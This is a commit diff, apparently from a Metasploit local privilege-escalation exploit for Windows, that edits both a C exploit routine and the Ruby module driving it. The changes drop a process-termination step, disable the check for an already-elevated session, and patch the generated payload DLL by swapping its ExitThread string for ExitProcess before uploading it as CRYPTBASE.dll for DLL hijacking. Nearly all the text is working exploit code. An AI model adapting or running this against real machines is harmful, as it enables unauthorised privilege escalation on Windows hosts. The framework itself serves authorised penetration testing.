Use ExitProcess
parent
cf12826d2c
commit
dc0f2b7291
Binary file not shown.
Binary file not shown.
|
@ -85,8 +85,6 @@ void exploit()
|
||||||
Wow64DisableWow64FsRedirection(&OldValue);
|
Wow64DisableWow64FsRedirection(&OldValue);
|
||||||
if (ShellExecuteExW(&shinfo) && shinfo.hProcess != NULL)
|
if (ShellExecuteExW(&shinfo) && shinfo.hProcess != NULL)
|
||||||
{
|
{
|
||||||
WaitForSingleObject(shinfo.hProcess, 200);
|
|
||||||
TerminateProcess(shinfo.hProcess, 0); // Even better if the template payload.dll calls ExitProcess
|
|
||||||
CloseHandle(shinfo.hProcess);
|
CloseHandle(shinfo.hProcess);
|
||||||
}
|
}
|
||||||
Wow64RevertWow64FsRedirection(OldValue);
|
Wow64RevertWow64FsRedirection(OldValue);
|
||||||
|
|
|
@ -1,8 +1,6 @@
|
||||||
##
|
##
|
||||||
# This file is part of the Metasploit Framework and may be subject to
|
# This module requires Metasploit: http//metasploit.com/download
|
||||||
# redistribution and commercial restrictions. Please see the Metasploit
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
# Framework web site for more information on licensing and terms of use.
|
|
||||||
# http://metasploit.com/framework/
|
|
||||||
##
|
##
|
||||||
|
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
|
@ -64,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system?
|
#fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system?
|
||||||
|
|
||||||
#
|
#
|
||||||
# Verify use against Vista+
|
# Verify use against Vista+
|
||||||
|
@ -154,6 +152,11 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
# Generate payload and random names for upload
|
# Generate payload and random names for upload
|
||||||
#
|
#
|
||||||
payload = generate_payload_dll
|
payload = generate_payload_dll
|
||||||
|
# Change ExitThread to ExitProcess ...
|
||||||
|
exit_thread = "\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\x00"
|
||||||
|
exit_process = "\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73"
|
||||||
|
index = payload.index(exit_thread)
|
||||||
|
payload[index,exit_process.length] = exit_process
|
||||||
payload_filepath = "#{tmpdir}\\CRYPTBASE.dll"
|
payload_filepath = "#{tmpdir}\\CRYPTBASE.dll"
|
||||||
|
|
||||||
print_status("Uploading the Payload DLL to the filesystem...")
|
print_status("Uploading the Payload DLL to the filesystem...")
|
||||||
|
|
Loading…
Reference in New Issue